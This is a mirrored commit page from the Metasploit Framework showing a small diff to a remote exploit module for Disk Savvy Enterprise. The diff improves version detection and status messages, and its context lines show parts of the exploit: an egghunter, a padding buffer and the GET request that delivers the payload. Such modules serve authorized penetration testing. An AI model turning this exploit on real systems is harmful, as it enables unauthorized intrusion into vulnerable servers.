mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-05 14:57:30 +01:00
Increase output
This commit is contained in:
parent
e3043b0889
commit
bda464fd6b
@ -77,9 +77,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/
|
||||
return Exploit::CheckCode::Appears
|
||||
elsif res.body =~ /Disk Savvy Enterprise/
|
||||
version = res.body[/Disk Savvy Enterprise v[^<]*/]
|
||||
if version
|
||||
vprint_status("Version detected: #{version}")
|
||||
if version =~ /9\.(1|3)\.14/
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
else
|
||||
@ -115,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
fail_with(Failure::NoTarget, 'No matching target')
|
||||
end
|
||||
|
||||
print_status("Selected Target: #{mytarget.name}")
|
||||
print_status("Selected target: #{mytarget.name}")
|
||||
end
|
||||
|
||||
eggoptions = {
|
||||
@ -137,6 +140,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
sploit << hunter
|
||||
sploit << rand_text_alpha(4500)
|
||||
|
||||
print_status('Sending malicious request...')
|
||||
|
||||
send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => sploit
|
||||
|
Loading…
Reference in New Issue
Block a user